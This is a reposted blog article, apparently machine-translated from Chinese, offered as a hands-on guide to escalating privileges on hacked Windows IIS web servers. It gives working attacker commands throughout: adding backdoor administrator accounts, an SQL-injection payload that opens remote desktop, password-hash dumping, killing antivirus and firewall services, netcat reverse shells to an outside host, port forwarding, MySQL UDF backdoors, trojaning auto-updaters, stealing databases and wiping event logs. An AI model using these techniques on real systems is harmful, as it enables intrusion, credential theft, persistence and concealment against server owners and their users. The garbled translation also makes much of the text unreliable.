[Web Authorization]
1. Whether cmd can be executed depends on this command: net user. If net fails, use net1. If net fails, upload a net to a writable and readable directory. Execute/c c: windows temp cookies net1.exe user

2. When the authorization is successfully raised and 3389 is not opened, and the vps of 3389 is not successfully uploaded, try to upload rootkit.asp. Log in with the user who has just raised the authorization, and then try again.

3. If the cmd refuses to access, it can upload a cmd.exe and its own uploaded suffix is not limited to cmd.exe/cmd.com/cmd.txt.

4. cmd command: systeminfo, check whether there are three patches KB952004, KB956572, and KB970483. If not, the first is pr, the second is Brazilian barbecue, and the third is iis6.0.

6. c: windows temp cookies This directory

7. Find the sa password or root password, and directly use the file search function of Malaysia to directly search, which is extremely convenient!

8. Solution for cmd executing exp without echo: enter exp path C: RECYCLER pr.exe in com path, clear (including/c) in command, and enter "net user jianmei daxia/add"

9. After adding users and upgrading them to administrator privileges, if you cannot connect to 3389, upload the rootkit.asp script, and the access will prompt you to log in. You can log in with the account password that has been successfully upgraded to have administrator privileges.

10. Sometimes abnormal monitoring does not allow users to be added. You can try to grasp the management hash value and upload "PwDump7 to crack the current management password (hash value)". Both of them can be uploaded. Execute PwDump7.exe, and then go to the website to decrypt.

11. Sometimes users can't be added. It may be that the password is too simple or too complex, and it may also be a soft interception. Command tasklist to view the process

12. In fact, only one executable file can be used for offsite lifting. Run cmd once, and then name the offsite ee.exe log.csv to execute it.

13. For the directory scanned by wt.asp, the red file can be replaced by exp. When executing the command, enter the path of the replaced file in cmd, and then empty the double quotation marks and add the user command.

14. If you have no choice but to raise your power, you can try TV remote control. It is very powerful to kill internal and external networks and penetrate the firewall.

15. When there is a space in the readable and writable directory, the following situation will occur: 'C: Documents' is not an internal or external command, nor is it a runnable program or batch file. The solution is to use the interactive shell of the kitchen knife to switch to the exp path, such as: Cd C: Documents and Settings All Users Application Data Microsoft directory
Then execute exp or cmd, the above situation will not exist. The aspshell cannot jump to the directory

16. Sometimes users can be added, but they cannot be added to the management group. It may be that administrators have changed their names. Net user administrator looks at the local group members, * administrators

17. After entering the server, you can continue to penetrate the intranet. At this time, you can try to open the router's default account password admin admin

18. Some cmd implementations are very abnormal. For asp Mali, the cmd path is filled in the top, and the following is filled in: "c: xxx exp.exe" whoami "Remember to add two double quotes in the front, or two after it if you can't. If you can't, put the exp path in the cmd, and the bottom remains unchanged.

19. Generally, users cannot be added, or users want to add vbs, bats, remote control ponies to the server's startup item, which can be achieved by using the tool "Dongdong that directly restarts the server on the blue screen",

20. When executing PwDump7.exe to grab the hash value, it is recommended to save the redirection result as 1.txt/c c: windows temp cookies PwDump7.exe>1.txt

21. Tips for kitchen knife execution: upload cmd to the executable directory, right click the cmd virtual terminal, help, and then set the terminal path to c: windows temp cmd.exe

22. When aspx is not supported, or if it supports but cannot cross directories, you can upload a vps reading iis, execute the command to list all website directories, and find the directory of the master station to cross.
Upload cscript.exe to the executable directory, then upload iispwd.vbs to the root directory of the website, cmd command/c "c: windows temp cookies cscript.exe" d: web iispwd.vbs

23. How to identify whether the server is an intranet? 192.168.x.x    172.16.x.x    10.x.x.x
 
((Complete dos commands)
View version: ver
View permission: whoami
View configuration: systeminfo
View user: net user
View process: tasklist
View the running service: tasklist/svc
View all open ports: netstat - ano
Query management user name: query user
View the setup environment: ftp 127.0.0.1
View the path of the specified service: sc qc MySQL
Add a user: net user jianmei daxia.asd/add
Promote to administrative permission: net localgroup administrators jianmei/add
Add a user and raise the permission: net user jianmei daxia.asd/add&net localgroup administrators jianmei/add
To view the information of a designated user: net user jianmei
Users with all administrative permissions: net localgroup administrators
Join the Remote Desktop User Group: net localgroup "Remote Desktop Users" jianmei/add
Maximum number of broken connections: mstsc/admin/v: 127.0.0.1
Delete user: net user jianmei/del
Delete administrator account: net user administrator daxia.asd
Change the system login password: net password daxia.asd
Activate GUEST user: net user guest/active: yes
Start TELNET service: net start telnet
Close McAfee: net stop "McAfee McShield"
Close the firewall: net stop sharedaccess
View all files in the current directory: dir c: windows\
View the content of the development file: type c: windows 1.asp
Copy cmd.exe to the temp directory of c: windows and name it cmd.txt: copy c: windows temp cookies cmd.exe c: windows temp cmd.txt
The command to open port 3389: REG ADD HKLM SYSTEM CurrentControlSet Control Terminal "" Server/v fDenyTSConnections/t REG_DWORD/d 0/f
Check the patch: dir c: windows >a.txt&(for% i in (KB952004.log KB956572.log KB2393802.log KB2503665.log KB2592799.log KB2621440.log KB2160329.log KB970483.log KB2124261. log KB977165. log KB958644. log) do @ type a.txt | @ find/i "% i" | | @ echo% i Not Installed!)& del /f /q /a a.txt
 
 
((SQL statement directly opens 3389)
3389 Login key registry location: HKEY_LOCAL_MACHINE SYSTEM CurrentControlSet Control TerminalServer DenyTSConnections
The key DenyTSConnections directly controls the opening and closing of 3389. When the key value is 0, 3389 is open, and 1 is closed.
The MSSQL xp_regwrite stored procedure can modify the registration. We can use this to simply modify the DenyTSConnections key value to control the closing and opening of 3389.
Open the SQL statement of 3389:
syue.com/xiaohua.asp? id=100; exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEM\CurrentControlSet\Control\Terminal Server’,’fDenyTSConnections’,’REG_DWORD’,0;–
Close the SQL statement of 3389:
syue.com/xiaohua.asp? id=100; exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEM\CurrentControlSet\Control\Terminal Server’,’fDenyTSConnections’,’REG_DWORD’,1;–
 
 
((Common soft killing)
360tray.exe 360 real-time protection
ZhuDongFangYu.exe 360 Active Defense
KSafeTray.exe Jinshan Guard
  
McAfee McShield.exe McCoffee
SafeDogUpdateCenter.exe Server Security Dog
 
 
((The use of sensitive directories and registry in Windows authorization)
Sensitive directory directory permission authorization purpose
C: Program Files The default user group users has the right to view the directory. You can view the application software installed on the server
C: Documents and Settings All Users Start Menu Programs Everyone has the right to view shortcuts, download files, and view the installation path for properties
C: Documents and Settings All Users Documents Everyone Full Control Permission Upload Execute cmd and exp
C: Windows system32 inetsrv Everyone Full Control Permission Upload Execute cmd and exp
C: Windows my.iniC: Program Files MySQL MySQL Server 5.0 my.ini default user group users with viewing permission will write the root password to this file when installing MySQL
C: Windows system32 The default user group users have the right to view. The Shift backdoor is usually in this folder. You can download the backdoor to crack the password
C: Documents and Settings All Users Start Menu Programs Start Everyone With view permission, you can try to write vbs or bat to the directory. The server will run after restarting.
C: RECYCLER D: RECYCLER Everyone fully controls the permissions recycle bin directory. Commonly used to execute cmd and exp
C: Program Files Microsoft SQL Server default user group users have the right to view the directory and collect mssql related information. Sometimes the directory also has executable permissions
C: Program Files MySQL default user group users has view permission to this directory Find the user in the MYSQL directory Root password in MYD
C: Oraclexe default user group users have permission to view the directory. You can try to use Oracle's default account to authorize
C: WINDOWS system32 config The default user group users have the right to view the directory and try to download the sam file for cracking
C: Program Files Geme6 FTP Server Remote Admin Remote.ini The default user group users has the right to view the directory The password of G6FTP is stored in the Remote.ini file
c: Program Files RhinoSoft. com Serv-U c: Program Files Serv-U The default user group users have the right to view the directory. The path and password of the virtual host website are stored in ServUDaemon.ini
c: Windows system32 inetsrv MetaBase.xml default user group users have view permission to this directory IIS profile
C: Tomcat5.0 conf resin.conf The default user group users has permission to view the directory. Tomat is the location where the password is stored
C: ZKEYS Setup.ini The default user group users has permission to view the directory. The location where ZKEYS virtual host stores passwords
 
 
((the sensitive registry location in the empowerment)
HKEY_LOCAL_MACHINE SOFTWARE Microsoft MSSQLServer MSSQLServer SuperSocketNetLib Tcp Mssql Port
HKLM SYSTEM CurrentControlSet Control Terminal Server DenyTSConnections is enabled when the remote terminal value is 0
Registry location of HKEY_LOCAL_MACHINE SOFTWARE MySQL AB mssql
HKEY_LOCAL_MACHINE SOFTWARE HZHOST CONFIG Huazhong host registry configuration location
User and password (su encrypted) location of HKEY_LOCAL_MACHINE SOFTWARE Cat Soft Serv-U Domains 1 UserList serv-u
HKEY_LOCAL_MACHINE SYSTEM CurrentControlSet Control TerminalServer WinStations RDP Tcp The value of PortNumber in the registry is the value of 3389 port
HKEY_CURRENT_USER Software PremiumSoftware Navicat Servers The registry location of Navicat, the mysql management tool, can be used by Google
The configuration file of HKEY_LOCAL_MACHINE SYSTEM RAdmin v2.0 Server Parameters Radmin is often exported for overwriting in the process of empowerment
HKEY_LOCAL_MACHINE SYSTEM ControlSet002 Services MSFtpsvc Parameters Virtual Roots IIS Registry Full Version Disclosure User Path and FTP User Name Vulnerability
HKEY_LOCAL_MACHINE software hzhost config Settings mastersvrpass passwords such as mssql and mysql saved in the registry of Huazhong host
HKEY_LOCAL_MACHINE SYSTEM LIWEIWENSOFT INSTALLFREEADMIN 11 The sa account password of the external host mssql, with dual MD5 encryption
HKEY_LOCAL_MACHINE SYSTEM ControlSet002 Services MSFtpsvc Parameters Virtual Roots ControlSet002 The registry location of the off satellite ftp, of course, also includes ControlSet001 and ControlSet003
 
 
((deletion and recovery of wscript.shell)
Load the wscript.shell object under cmd or run it directly: regsvr32/u% windir% system32 WSHome Ocx
 
Uninstall the FSO object and run it under cmd or directly: regsvr32.exe/u% windir% system32 scrun.dll
 
Uninstall the stream object and run it in cmd or directly: regsvr32/s/u "C: ProgramFiles CommonFiles System ado msado15. dll"
 
If you want to restore, just remove/U and re register the above related ASP components, so that the sub components can be used
 
 
(How to find the exact terminal connection port?)
In aspx Mali, click "System Information" and the third is the current 3389 port
Or execute the command to view the running service: tasklist/svc
Found: svchost.exe 1688 TermService
Remember the ID value of 1688,
View all open ports: netstat - ano
Find that the port corresponding to the ID value 1688 is the current port 3389
 
 
((The iis6 rights prompt can not find the breakthrough method of wmiprvse.exe)
Breakthrough method 1:
In the IIS environment, if the permissions are not strict, we have the right to directly end the wmiprvse.exe process in the aspx horse, and check the process directly
After the end, it will run again. At this time, the PID value is different. At this time, we come back to run exp and directly kill seconds.

Breakthrough method 2:
The virtual host, whose permissions are generally strictly limited, does not have permission to end. At this time, we can consider cooperating with other overflow tools to force the server to restart, such as "something that directly restarts the server on the blue screen"
It can even be violent. The DDOS will kill you in seconds. If the management finds that the server fails, it must first think that the server is dead. When he restarts the server (even if IIS restarts), he will also kill you in seconds.
 
 
((Local spillover empowerment)
The computer has a place called the buffer area. The length of the program's buffer area is preset. If the user's input data exceeds the length of the buffer area, the program will overflow
The cache overflow vulnerability is mainly caused by many software that does not check the cache
Use some existing exploits that cause overflow vulnerabilities to promote users from the users group or other system users to the administrators group by running
If you want to execute the cmd command, you need to build support for wscript.shell or support aspx scripts, because aspx scripts can call. net components to execute cmd commands
 
 
((sa right))
Scan the open port, and after 1433 is opened, you can find the sa password for authorization. Use the search file function in Malaysia, and the sa password is generally in the conn.asp config.asp web.config files
You can also find the configuration file through the registry to see if aspx is not supported. If it is supported, go to other sites across directories. After finding it, log in with the SQL authorization provided by the aspshell, and then execute the command to create a user.
The execution command of aspx Marty is a little different. Click Database Management - select MSSQL - server=localhost; UID=sa; PWD=; database=master; Provider=SQLOLEDB – Enter the account password to connect
Add a user: exec master.dbo.xp_cmdshell 'net user jianmei daxia. asd/add'; –
Promote to administrator: exec master.dbo.xp_cmdshell 'net localgroup administrators jianmei/add'; –
PS: If it cannot be added, it means that xp_cmdshell has not been built. Add xp_cmdshell: Use master dbcc addendedproc ('xp_cmdshell', 'xplog70. dll')
 
 
(root authorization)
The premise of using MySQL to grant authority is that the server has installed MySQL, and the MySQL service has not been downgraded. By default, it is installed with system authority inherited (system authority) And obtained the root account password
How to determine whether mysql on a Windows server has been downgraded?
Cmd command net user If there are users like mysql and mssql or similar users, it is usually that its mssql and mysql services have been downgraded and run
How to determine whether the MySQL service is enabled on the server?
When 3306 port is opened, some administrators will change the default port. Another way to determine whether the website supports PHP is to use MySQL database if it supports PHP
How to view the root password?
Find the user.myd file in the mysql installation directory, and the root is hidden in it. Generally, 40 bit cmd encryption is used. Some PHP websites use the root user to install them in the conn.asp config.asp files.
Sometimes it seems very messy. At this time, you need to combine by yourself. The top 17 can be found in the first line, and the other 23 can be found in the third line or other lines.
You can directly use "mysql execution" in the PHP script or upload a UDF.php. If the website does not support PHP, you can go to another PHP station or upload UDF.php to another PHP shell.
After filling in the account password, it is natural to install the DLL. Click "Automatically install MySQL BackDoor" to display that after the function is successfully exported and created, the command to add a user can be executed immediately.
Note: For versions below 5.0 (including 5.0), the default c: windows system directory is sufficient. For versions above 5.1, you cannot export them to the system directory to create custom functions. You can only export them to the lib/plugin directory under the mysql installation directory
For example: D:/Program Files/MySQL/MySQL Server 5.1/lib/plugin/mysql.dll
If the password cannot be seen, or the combination is less than 40 bits, install a MySQL locally,
1. Stop mysql service
2. Replace the three downloaded files (user.MYI user.MYD user.frm)
3. The cmd switches to the bin directory and enters the MySQL security mode. The cmd command: mysqld nt – skip grant tables
4. Re open a cmd and switch to the bin directory. The cmd command: mysql - u root version may be different: mysql - uroot - proot
5. Finally, the query results in select user, password from mysql.user;
 
 
((serv-u rights raising)
This file contains the md5 password of serv-u: C: Program Files RhinoSoft. com Serv-U ServUDaemon.ini
Find this file: ServUDaemon.ini Open it and find: LocalSetupPassword=nqFCE64E0056362E8FCAF813094EC39BC2
Then take the md5 ciphertext to decrypt, and use the current password to log in and raise the right.
The prerequisite for serv-u to improve its rights is that port 43958 is opened and the account password is known!
If the account password is defaulted, you can use the serv-u authorization function in the shell directly. It is recommended to use the aspx horse and php horse to authorization, because you can see the echo.
530 indicates that the password is not the default, 330 indicates success, and 900 indicates that the password is the default
Find a shortcut in the program, or download the relevant files to the local, and then check the file properties to find the installation directory of serv-u.
Serv-u authorization for directory modification:
Find the directory of serv-u, and then find the user's configuration file ServUDaemon.ini. Add a user code directly and save it!
Then the local cmd command: ftp server ip
Enter, enter the account password, and then enter
Next, try the common cmd command for authorization. If not, use the ftp authorization command:
Quote site exec net user ABCD/add Add a user
Quote site exec net localgroup administrators jianmei/add Promote to administrator privileges
200 EXEC command successful (TID=33). Successfully executed echo information
Maintenance=System permission type plus one line to specify the new account as the system administrator
ReloadSettings=True This item needs to be added after modifying the ini file. At this time, serv-u will automatically refresh the configuration file and take effect
 
 
(Port forwarding)
When is the forwarding port suitable?
1. The server is an intranet, and we cannot connect.
2. There is a firewall on the server, blocking our connection.
The premise of forwarding port is that we have an external network or an external network server.
Find a readable and writable directory to upload lcx.exe
Local cmd command: lcx.exe - list 1988 4567 (listen to local 1988 port and forward to 4567 port)
Then the shell command:/c c: windows temp cookies lcx.exe - slave native ip 1988 server ip 3389 (forward the server 3389 port to the local 4567 port)
Then the local connection: 127.0.0.1:4567
The above is the operation in the case of the local Internet, and then how to operate in the Internet server:
Upload lxc.exe cmd.exe to the server and the same directory, and execute the cmd.exe command: lcx.exe - list 1988 4567
Then click the port mapping in the aspx shell. The remote IP is changed to the site IP. Fill in 1988 for the remote port, click the mapping port, and then connect 127.0.0.1:4567 in the server.
 
 
((NC rebounds and raises rights)
When you can execute net user, but cannot create a user, you can use NC rebound to raise authority. Especially for intranet servers, it is better to use NC rebound to raise authority.
However, this method also fails as long as the other side has installed a firewall or blocked all ports except the commonly used ones
Find a readable and writable directory to upload nc.exe cmd.exe

-L Monitor local stack information
-P port Open the local port
-T Reply to the stack entry request in telnet
-E Program redirection
Local cmd execution: nc - vv - l - p 52 rebound
Then execute the command in the shell: c: windows temp nc.exe - vv server ip 999 - e c: windows temp cmd.exe It is better to use a port like 80 or 8080, which is much less likely to be blocked by the firewall
After successful execution, the local cmd command: cd/(just a habit)
Then connect to the server with the telnet command: telnet server ip 999
Enter to display the IP address of the selected server, which indicates success. Then the permission is relatively large, try to establish a user!
bad guy:
Local cmd execution: nc - vv - l - p 52 rebound
c: Windows temp nc.exe - e c: windows temp cmd.exe server ip 52
Low profile Xiaofei:
The shell executes the command c: windows temp nc.exe - l - p 110 - t - e c: windows temp cmd.exe

In general, the success rate of this format is very small. It is better to enter the command c: windows temp nc.exe directly from cmd. Here, enter - vv server ip 999 - e c: windows temp cmd.exe
The success rate of this technique is much higher than that of the above one. Not only NC can do this, but also pr and other weight raising exps can.
 
 
((Out of satellite right)
How to know if it is an off satellite host?
First: "freehost" exists in the physical path of the website
Second: asp Mali click program, there are folders such as "7i24 virtual host management platform" and "off satellite host"
Default account: freehostrunat
Default password: fa41328538d7be36e83ae91a78a1b16f! seven
The freehostrunat user is automatically created when installing the extrasatellite system. It already belongs to the administrators management group, and the password does not need to be decrypted. You can log in to the server directly
Off satellite often written directory:
C:\RECYCLER\
C:\windows\temp\
e:\recycler\
f:\recycler\
C:\php\PEAR\
C:\WINDOWS\7i24.com\FreeHost
C:\php\dev
C:\System Volume Information 
C:\7i24.com\serverdoctor\log\
C:\WINDOWS\Temp\
c:\windows\hchiblis.ibl 
C:\7i24.com\iissafe\log\ 
C:\7i24.com\LinkGate\log 
C:\Program Files\Thunder Network\Thunder7\
C:\Program Files\Thunder Network\Thunder\
C:\Program Files\Symantec AntiVirus\SAVRT\
c:\windows\DriverPacks\C\AM2
C:\Program Files\FlashFXP\
c:\Program Files\Microsoft SQL Server\90\Shared\ErrorDumps\
C:\Program Files\Zend\ZendOptimizer-3.3.0\ 
C:\Program Files\Common Files\
c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv
c:\Program Files\360\360Safe\deepscan\Section\mutex.db
c:\Program Files\Helicon\ISAPI_Rewrite3\error.log
c:\Program Files\Helicon\ISAPI_Rewrite3\Rewrite.log 
c:\Program Files\Helicon\ISAPI_Rewrite3\httpd.conf 
c:\Program Files\Common Files\Symantec Shared\Persist.bak 
c:\Program Files\Common Files\Symantec Shared\Validate.dat 
c:\Program Files\Common Files\Symantec Shared\Validate.dat 
C:\Program Files\Zend\ZendOptimizer-3.3.0\docs
C:\Documents and Settings\All Users\DRM\
C:\Documents and Settings\All Users\Application Data\McAfee\DesktopProtection
C:\Documents and Settings\All Users\Application Data\360safe\softmgr\
C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x\ZendOptimizer.dll 
C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\

Ee right raising method:
Find a readable and writable directory to upload ee.exe
Cmd command:/c c: windows temp cookies ee.exe - i (get the ID value of the off satellite account, for example, echo: FreeHost ID: 724)
Then command:/c c: windows temp cookies ee.exe - u 724 (obtain the account password outside the satellite)

Vbs method:
Find a readable and writable directory to upload cscript.exe iispwd.vbs
Cmd command:/c "c: windows temp cookies cscript.exe" c: windows temp cookies iispwd.vbs
It means reading the iis. In this way, you can not only obtain the account password outside the satellite, but also see the directories of all sites on the same server.

Complete feasible ideas:
After testing, the file permissions in the following directories are all everyone, which can be modified, uploaded, replaced, deleted, and most importantly, executed:
360 antivirus db file replacement:
c:\Program Files\360\360SD\deepscan\Section\mutex.db 
c:\Program Files\360\360Safe\deepscan\Section\mutex.db 
C:\Program Files\360\360Safe\AntiSection\mutex.db
IISrewrite3 file replacement:
C:\Program Files\Helicon\ISAPI_Rewrite3\Rewrite.log
C:\Program Files\Helicon\ISAPI_Rewrite3\httpd.conf
C:\Program Files\Helicon\ISAPI_Rewrite3\error.log
Norton antivirus file replacement:
c:\Program Files\Common Files\Symantec Shared\Persist.bak 
c:\Program Files\Common Files\Symantec Shared\Validate.dat 
c:\Program Files\Common Files\Symantec Shared\Persist. Dat
First class filtering related directories and files:
C:\7i24.com\iissafe\log\startandiischeck.txt 
C:\7i24.com\iissafe\log\scanlog.htm
other:
Zend file replacement: C: Program Files Zend ZendOptimizer-3.3.0 lib Optimizer-3.3.0 php-5.2. x ZendOptimizer.dll
Huadun file replacement: C: WINDOWS hchiblis.ibl
Flash file replacement: C: WINDOWS system32 Macromed Flash Flash10q.ocx
DU Meter traffic statistics log file replacement: c: Documents and Settings All Users Application Data Hagel Technologies DU Meter log.csv
 
 
(360 rights raising)
Find a readable and writable directory to upload 360.exe
Cmd command:/c c: windows temp cookies 360.exe
There will be 3 prompts in English:
 
360 Antivirus Privilege Escalation Exploit By friddy 2010.2.2
 
You will get a Shift5 door!
 
Shift5 Backdoor created!  
 
This is a sign of success. Then connect to the server and press the Shift key 5 times. The task manager will pop up. Click New Task: explorer.exe will appear on the desktop. Next, everyone will do it
 
 
(Sogou raises the right)
The directory of Sogou is readable and writable by default. Sogou will automatically upgrade every once in a while, and the upgraded file is pinyinup.exe
We just need to replace this file with our own remote control trojan, or add batch processing of accounts. When Sogou upgrades, we can achieve our goal.
 
 
((The right of Huazhong virtual host is raised)
As far as experience is concerned, the general overflow authorization has no effect on the virtual host, and Huazhong does not have such obvious vulnerabilities outside the satellite.
Therefore, the key point for Huazhong to raise its rights is to collect information. The main registry location is:
HKEY_LOCAL_MACHINE\SOFTWARE\HZHOST\CONFIG\
HKEY_LOCAL_MACHINE software hzhost config settings mysqlpass root password
HKEY_LOCAL_MACHINE software hzhost config settings mssqlpss sa password
c: In windows temp, there are ftp login records left by the host, including user name and password
The above information is used with the hzhosts Huazhong virtual host system 6. x database password cracking tool
Baidu search: hzhosts Huazhong virtual host system 6. x password cracking tool for database
 
 

((N-point virtual host))
The default database address of the N-point virtual host management system is: host_date # host # date #. mdb
Rl can't be entered directly. Let's replace #=% 23 space=% 20
The modified download address is/host_date/% 23host% 20% 23% 20date% 23196.mdb
After downloading the N-point database, find the sitehost table FTPuser&FTPpass value FTPpass is the N-point encrypted data, and then decrypt it with the N-point decryption tool to obtain the FTP password
N point default installation path C: Program Files NpointSoft npointhost web\
D:\Program Files\NpointSoft\npointhost\web\
The default permissions are readable. When the virtual host used by the other party is N point, you can consider reading the folder to download the database
N-point decryption tool code
<%
set iishost=server. CreateObject(“npoint.host”)
x=iishost. Eduserpassword ("FTPpass value", 0)
response.write x
%>
Open and access the local N-point environment in the N-point directory. The obtained password minus the last 10 characters is the virtual host management password of N points.
Then you need to find the Hostip or hostdomain in the hostcs table under the login confirmation of the management system
Generally, the default is Hostip=127.0.0.1 hostdomain=www.npointhost.com. It can be ignored here because if it is not modified here, the host_domain in the server's default IP address sitehost table is the bound domain name. You can directly check the IP address and then scan the address in batch.
The management system address is the IP address. Select the virtual host to log in
Next, everyone should know the shell.
Next, the password decryption method for the sa root account in the authorized hostcs table is the same. All decryption results are 123456 by default
In addition, there is a 30 bit cfs encryption of the N-point system management password in the adminlogo http://www.md5.com.cn/cfs Try it after collision or crack it with asm tools. I'm unlucky
3057C0DB854C878E72756088058775 This is the default admin password
 
 
((Drag Library)
Access database stripping is very simple. You can download the database directly. The MSSQL database can use the stripping function provided by the shell or the ASP stripping script to find the file of database connection information, such as web.config.asp
Log in to the asp stripper script with the account password, find the management table, find the membership database (UserInfo), and then export it. MySQL database usually uses php script to find the website data connection information:
'host'=>'localhost: 3306', database ip
'user'=>'iweb', user
'passwd'=>'nnY5bvRNnJ4vKpmb', password
'name'=>'iwebshop', database name
Then upload the php pants removal script. After entering the database drag interface, there is an option to select the database name on the left. This is iwebshop. After selecting the database name, a list will appear. Click whichever you want to remove, and then click select data
Import means import, while Export means export. We drag the library, of course, we select Export, then select Save, and then click Export to start stripping.
If phpmysql is installed on the server, you can also find the page, log in with the root account password you just found, and you can drag libraries in it, just like uploading a php drag script.
 
 
(Server)
The command prompt has been disabled by the system administrator?
Solution: Run → gpedit.msc → User Configuration → Management Template → System, find the "Block Command Prompt" on the right, double click it, select "Not Configured" in "Settings", and finally click "OK".

How to determine the type of server?
Solution: Ping the server IP directly and check the echo information
TTL=32     9X/ME
TTL=64     linux
TTL=128    2000X/XP
TTL=255    UNIX

Why sometimes 3389 is open but cannot be connected?
Cause analysis: Sometimes it is because the firewall forwards 3389 to other ports to connect, and some cannot connect after forwarding, which is because the administrator sets port restrictions in TCP/IP
Solution: We need to change the port to only one of the ports allowed to connect in TCP/IP. A better solution is to cancel the port restriction.

What is the easiest way to upload something to the server?
Open the tool "HFS network file server" on this computer, drag the tool to be uploaded directly into the first box on the left, copy the address above, visit the browser in the server, and then download it

Restrict the permission to run the Command Prompt?
My computer (right click) - in Explorer - click the "Tools" button, select "Folder Options", switch to the "View" tab, remove the check in front of "Use simple file sharing (recommended)", this step is to make the "Security" tab appear in the file's attribute menu, then enter "c: windows system32 ", find "cmd. exe", Right click "Properties", switch to the "Security" tab, delete all users in the "Group or User Name" except the administrator, and then click "OK". When an ordinary user wants to run the "Command Prompt", a warning box of "Access Denied" will appear.

How can I change the maximum number of connections in Windows 2003?
The remote desktop function in Windows 2003 is very convenient, but the initial setting allows only two users to log in at the same time. Sometimes, because I am disconnected after logging in from the company, my colleagues are disconnected after logging in from other users at home. When I connect again, I always report an error that "the terminal service exceeds the maximum number of connections". At this time, neither my colleagues nor I can log in, Increase the number of connections by running the following method: services.msc. Enable license logging. Don't forget to close license logging after adding
Open the "Authorization" in the control panel of win2k3, and click "Add License" to enter the number of connections to be changed

How to clear the IP log in the server?
1. My Computer Right click Management – Event Viewer – Security – Right click to clear all events
2. Open my computer – Disk C – Windows – system32 – config – AppEvent Evt Properties – Security – Reject All
3. Klaklog.evt attribute – Security – Reject All – SecEvent Tvt Properties – Security – Reject All
Please retain the copyright information for reprinting: Maoke Studio

Original article reprint please specify: reprint from Seven Travelers Blog

Fixed link of this article: https://www.qxzxp.com/4013.html